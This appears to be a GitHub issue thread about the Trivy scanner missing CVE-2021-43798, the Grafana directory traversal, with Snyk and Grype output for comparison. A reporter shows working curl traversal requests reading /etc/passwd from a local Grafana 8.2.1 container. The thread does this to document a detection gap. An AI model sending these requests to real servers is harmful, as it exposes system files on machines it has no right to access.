Closed stefanlasiewski closed 2 years ago
I can confirm that this container version is vulnerable:
$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
94635778b702 grafana/grafana:8.2.1 "/run.sh" 7 seconds ago Up 6 seconds 0.0.0.0:3000->3000/tcp grafana
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?
@stefanlasiewski thanks for your report! let me investigate it.
@jerbia you're right, Grafana deployed as a binary, and trivy
doesn't detect it.
@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?
For the record, docker scan
(which uses Snyk) doesn't find the vulnerability either:
$ docker scan --severity medium grafana/grafana:8.2.1
Testing grafana/grafana:8.2.1...
Organization: stefanlasiewski
Package manager: apk
Project name: docker-image|grafana/grafana
Docker image: grafana/grafana:8.2.1
Platform: linux/amd64
Base image: grafana/grafana:8.2.1
Licenses: enabled
✓ Tested 34 dependencies for known issues, no vulnerable paths found.
Base Image Vulnerabilities Severity
grafana/grafana:8.2.1 11 0 critical, 0 high, 0 medium, 11 low
Recommendations for base image upgrade:
Minor upgrades
Base Image Vulnerabilities Severity
grafana/grafana:8.3.2 0 0 critical, 0 high, 0 medium, 0 low
And neither does Anchore's SBOM method with syft
/grype
(FTR: Grype's issue is at https://github.com/anchore/grype/issues/534 )
$ grype -q grafana/grafana:8.2.1
NAME INSTALLED FIXED-IN VULNERABILITY SEVERITY
busybox 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
busybox 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
github.com/cortexproject/cortex v1.8.2-0.20210428155238-d382e1d80eaf GHSA-jphm-g89m-v42p Medium
github.com/google/flatbuffers v1.12.0 CVE-2020-35864 High
github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 GHSA-grj5-8x6q-hc9q Medium
github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 CVE-2021-36156 Medium
github.com/prometheus/prometheus v1.8.2-0.20210621150501-ff58416a0b02 CVE-2019-3826 Medium
google.golang.org/protobuf v1.27.1 CVE-2015-5237 High
ssl_client 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
ssl_client 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
@stefanlasiewski in this case, trivy
detected and checked two binary files grafana-cli
and grafana-server
(contains three medium vulnerabilities).
but the app is a scope of files... need to think over it.
maybe i miss something
Thanks for your investigation!
This issue is stale because it has been labeled with inactivity.
Hi @afdesk Do you happen to have any fixes in mind for this? It's till happening on Trivy 0.23.
stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
,,,
stefanl@stefanl:~ $ trivy --version
Version: 0.23.0
This issue is stale because it has been labeled with inactivity.
Description
Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.
https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
However, Trivy doesn't seem to be picking it up. Why os this?
What did you expect to happen?
I expect this command to list CVE-2021-43798:
What happened instead?
It doesn't list this CVE:
Output of run with
-debug
:Output of
trivy -v
:Additional details (base image name, container registry info...):
n/a